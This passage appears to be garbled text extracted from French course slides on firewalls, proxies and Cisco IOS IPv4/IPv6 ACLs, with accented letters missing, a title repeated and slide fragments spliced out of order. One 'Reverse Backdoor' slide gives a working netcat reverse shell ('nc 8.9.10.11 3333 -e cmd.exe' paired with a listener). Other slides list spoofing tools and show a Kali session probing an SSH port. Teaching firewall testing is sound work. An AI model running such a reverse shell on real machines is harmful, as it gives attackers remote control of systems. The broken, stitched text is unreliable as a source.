Icnd1aclsipv4ipv6 150903173017 Lva1 App6891
Icnd1aclsipv4ipv6 150903173017 Lva1 App6891
Icnd1aclsipv4ipv6 150903173017 Lva1 App6891
IP ROUTING
Le fait de garder en souvenir les tats de connexions prcdents permet de mieux dtecter et carter
les intrusions et assurer une meilleure scurit. Le pare-feu est programm pour distinguer les
paquets lgitimes pour diffrents types de connexions. Seuls les paquets qui correspondent une
connexion active connue seront autoriss par le pare-feu, d'autres seront rejets.
Linspection dtat (stateful inspection), appele aussi le filtrage dynamique (Dynamic Packet
Filtering) est une fonctionnalit de scurit qui est souvent implmente dans des rseaux
d'entreprises. Cette fonctionnalit a t invente par Check Point Software, qui la lance avec leur
logiciel FireWall-1 en 1994.
http://fr.wikipedia.org/wiki/Pare-feu_%C3%A0_%C3%A9tats
Un Forwarding proxy prend en charge les Un proxy ouvert prend en charge les
requtes venant dun rseau interne et les requtes venant de nimporte quel rseau
transfre vers lInternet. et les transfre vers lInternet.
goffinet@goffinet, Firewalls et ACLs Cisco IOS IPv4/IPv6 IPv6, CC-BY
24
Fonctionnalits supplmentaires
Dans le mme ordre d'ides, compte tenu de son
emplacement critique, il hbergera des fonctions :
de concentrateur VPN,
de rpartiteur de charge du trafic,
de traffic shapping et de contrle de congestion (WAN)
le support des encapsulations VLAN,
des protections contre les virus, logiciels et messages
TCP/IP malveillants,
de la dtection et/ou de la prvention de d'intrusion
(IDS/IPS),
bien que ntant pas dans ses attributions le support
des protocoles de routage,
etc.
goffinet@goffinet, Firewalls et ACLs Cisco IOS IPv4/IPv6 IPv6, CC-BY
25
Dernires recommandations
En soi, le pare-feu ne protge le rseau que de manire
incomplte. On compltera l'infrastructure scurise par
des solutions de surveillance du rseau.
Une infrastructure de gestion des anti-virus et pare-feu
locaux ainsi que des mises jours des systmes
d'exploitation et des logiciels installes est aussi
conseille.
Enfin, il ny a pas de scurit du rseau sil nexiste pas
de document qui dcrit les politiques de scurit de l
organisation.
Lordre de
cration des
interfaces est
important.
51
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Scnarios de test : Topologie client
52
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Scnarios sur le lab : Topologie
client/server
53
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Exemple : Reverse Backdoor
Pour excuter une attaque Backdoor :
Sur la machine joindre
nc l p 3333
Sur la machine distante
nc 8.9.10.11 3333 -e cmd.exe
54
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
Outils daudit
Couche/protocole commandes
Application DNS : nslookup, dig
Ethernet/ARP arp
arping
arp-scan
macchanger
arpspoof
55
goffinet@goffinet.eu, Pare-feu thorie et pratique, CC-BY
4. ACLs Cisco IOS
#show access-lists
Extended IP access list IPv4_LAN
10 permit tcp 192.168.0.0 0.0.255.255 any eq www
20 permit tcp 192.168.0.0 0.0.255.255 any eq 443
Filtrer
192.168.2.40/30
192.168.2.40 255.255.255.252
ACL : 192.168.2.40 0.0.0.3
#show access-lists
Extended IP access list IPv4_LAN
10 permit tcp 192.168.0.0 0.0.255.255 any eq www (5 match(es))
20 permit tcp 192.168.0.0 0.0.255.255 any eq 443
(config)#int f0/0
(config-subif)#ip access-group IPv4_LAN in
(config)#line vty 0 4
(config-line)#ip access-class VTY in
interface f0/1.1
ip nat inside
interface f0/1.2
ip nat inside
interface f0/0
ip nat outside
Gateway#
Pass
quivalent laction permit dun ACL.
Ne suit pas ltat des connexions ou des sessions.
Ncessite une rgle correspondante pour du trafic de retour.
Drop
quivalent laction deny dun ACL.
Une option log est possible pour journaliser les paquets rejets.
root@kali:~# ip route
default via 192.168.1.1 dev eth0
192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.18
root@kali:~# nc -v 192.168.101.2 22
192.168.101.2: inverse host lookup failed: Unknown server error :
Connection timed out
(UNKNOWN) [192.168.101.2] 22 (ssh) open
SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4
100%[======================================>] 4 454
--.-K/s ds 0,02s
100%[======================================>] 4 454
--.-K/s ds 0,03s
Username:
Les ACLs IPv6 sont appliques sur les interfaces en utilisant la commande
ipv6 traffic-filter access-list-name {in | out}.
Comme les ACLs IPv4, les ACLs IPv6 contiennent une rgle
imlicite qui refuse tout autre trafic.
deny ipv6 any any